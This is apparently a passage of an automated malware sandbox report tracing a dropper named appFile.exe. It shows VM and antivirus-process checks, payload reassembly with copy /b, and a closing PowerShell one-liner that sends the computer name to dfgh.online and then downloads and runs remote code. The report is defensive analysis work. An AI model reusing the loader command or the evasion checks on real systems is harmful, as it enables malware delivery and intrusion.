      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\S25734VPZD3VQL5I0DLUI2DAUAHZO.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\is-HEHVN.tmp\S25734VPZD3VQL5I0DLUI2DAUAHZO.tmpProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\is-HEHVN.tmp\S25734VPZD3VQL5I0DLUI2DAUAHZO.tmpProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\is-HEHVN.tmp\S25734VPZD3VQL5I0DLUI2DAUAHZO.tmpProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\is-HEHVN.tmp\S25734VPZD3VQL5I0DLUI2DAUAHZO.tmpProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\is-HEHVN.tmp\S25734VPZD3VQL5I0DLUI2DAUAHZO.tmpProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\is-HEHVN.tmp\S25734VPZD3VQL5I0DLUI2DAUAHZO.tmpProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\is-HEHVN.tmp\S25734VPZD3VQL5I0DLUI2DAUAHZO.tmpProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\is-HEHVN.tmp\S25734VPZD3VQL5I0DLUI2DAUAHZO.tmpProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\S25734VPZD3VQL5I0DLUI2DAUAHZO.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\is-EOJP5.tmp\S25734VPZD3VQL5I0DLUI2DAUAHZO.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\is-EOJP5.tmp\S25734VPZD3VQL5I0DLUI2DAUAHZO.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\is-EOJP5.tmp\S25734VPZD3VQL5I0DLUI2DAUAHZO.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\is-EOJP5.tmp\S25734VPZD3VQL5I0DLUI2DAUAHZO.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\is-EOJP5.tmp\S25734VPZD3VQL5I0DLUI2DAUAHZO.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\is-EOJP5.tmp\S25734VPZD3VQL5I0DLUI2DAUAHZO.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\is-EOJP5.tmp\S25734VPZD3VQL5I0DLUI2DAUAHZO.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\is-EOJP5.tmp\S25734VPZD3VQL5I0DLUI2DAUAHZO.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\is-EOJP5.tmp\S25734VPZD3VQL5I0DLUI2DAUAHZO.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\is-EOJP5.tmp\S25734VPZD3VQL5I0DLUI2DAUAHZO.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\is-EOJP5.tmp\S25734VPZD3VQL5I0DLUI2DAUAHZO.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\is-EOJP5.tmp\S25734VPZD3VQL5I0DLUI2DAUAHZO.tmpProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Roaming\UltraMedia\vsv_tool.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX

      Malware Analysis System Evasion

      barindex
      Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
      Source: C:\Users\user\AppData\Local\Temp\723356\Ted.comWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
      Query firmware table information (likely to detect VMs)
      Source: C:\Users\user\AppData\Local\Temp\723356\Ted.comSystem information queried: FirmwareTableInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3595Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3269Jump to behavior
      Source: C:\Users\user\AppData\Local\Temp\is-EOJP5.tmp\S25734VPZD3VQL5I0DLUI2DAUAHZO.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-O7LIQ.tmp\_isetup\_setup64.tmpJump to dropped file
      Source: C:\Users\user\AppData\Local\Temp\is-HEHVN.tmp\S25734VPZD3VQL5I0DLUI2DAUAHZO.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-QU1EC.tmp\_isetup\_setup64.tmpJump to dropped file
      Source: C:\Users\user\AppData\Local\Temp\is-HEHVN.tmp\S25734VPZD3VQL5I0DLUI2DAUAHZO.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-QU1EC.tmp\_isetup\_isdecmp.dllJump to dropped file
      Source: C:\Users\user\AppData\Local\Temp\is-EOJP5.tmp\S25734VPZD3VQL5I0DLUI2DAUAHZO.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-O7LIQ.tmp\_isetup\_isdecmp.dllJump to dropped file
      Source: C:\Users\user\AppData\Local\Temp\723356\Ted.com TID: 6656Thread sleep time: -120000s >= -30000sJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6660Thread sleep count: 3595 > 30Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6704Thread sleep count: 3269 > 30Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6320Thread sleep time: -3689348814741908s >= -30000sJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6680Thread sleep time: -30000s >= -30000sJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6612Thread sleep time: -922337203685477s >= -30000sJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\723356\Ted.comWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
      Source: C:\Users\user\Desktop\appFile.exeCode function: 0_2_00406301 FindFirstFileW,FindClose,0_2_00406301
      Source: C:\Users\user\Desktop\appFile.exeCode function: 0_2_00406CC7 DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_00406CC7
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\723356\Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\723356Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\Jump to behavior
      Source: S25734VPZD3VQL5I0DLUI2DAUAHZO.tmp, 00000013.00000002.2379737174.00000000012AD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\{
      Source: S25734VPZD3VQL5I0DLUI2DAUAHZO.tmp, 00000013.00000002.2379737174.00000000012AD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}^
      Source: powershell.exe, 00000010.00000002.2153441742.0000000007494000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
      Source: appFile.exeBinary or memory string: Hyper-V Administrators
      Source: C:\Users\user\AppData\Local\Temp\723356\Ted.comProcess information queried: ProcessInformationJump to behavior
      Source: C:\Users\user\Desktop\appFile.exeCode function: 0_2_00406328 GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_00406328
      Source: C:\Users\user\AppData\Roaming\UltraMedia\vsv_tool.exeCode function: 49_2_00BE58BB mov eax, dword ptr fs:[00000030h]49_2_00BE58BB
      Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: DebugJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: DebugJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
      Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug
      Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug
      Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug
      Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug
      Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug
      Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug
      Source: C:\Users\user\Desktop\appFile.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Shore Shore.cmd & Shore.cmdJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa" Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 723356Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\extrac32.exe extrac32 /Y /E GuitarJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "Principle" Portions Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Requirements + ..\Ul + ..\Pupils + ..\Vista + ..\Sound + ..\Shelf FJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\723356\Ted.com Ted.com FJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5Jump to behavior
      Source: C:\Users\user\AppData\Local\Temp\is-HEHVN.tmp\S25734VPZD3VQL5I0DLUI2DAUAHZO.tmpProcess created: C:\Users\user\AppData\Local\Temp\S25734VPZD3VQL5I0DLUI2DAUAHZO.exe "C:\Users\user\AppData\Local\Temp\S25734VPZD3VQL5I0DLUI2DAUAHZO.exe" /VERYSILENTJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\is-EOJP5.tmp\S25734VPZD3VQL5I0DLUI2DAUAHZO.tmpProcess created: C:\Users\user\AppData\Roaming\UltraMedia\vsv_tool.exe "C:\Users\user\AppData\Roaming\UltraMedia\vsv_tool.exe"
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "wrsa.exe"
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "opssvc.exe"
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "avastui.exe"
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "avgui.exe"
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "nswscsvc.exe"
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "sophoshealth.exe"
      Source: C:\Users\user\AppData\Local\Temp\723356\Ted.comProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -exec bypass [net.servicepointmanager]::securityprotocol = [net.securityprotocoltype]::tls12; $gd='https://dfgh.online/invoker.php?compname='+$env:computername; $ptsr = iwr -uri $gd -usebasicparsing -useragent 'mozilla/5.0 (windows nt 10.0; win64; x64) applewebkit/57.36 (khtml, like gecko) chrome/12.0.0.0 safari/57.36'; iex $ptsr.content;
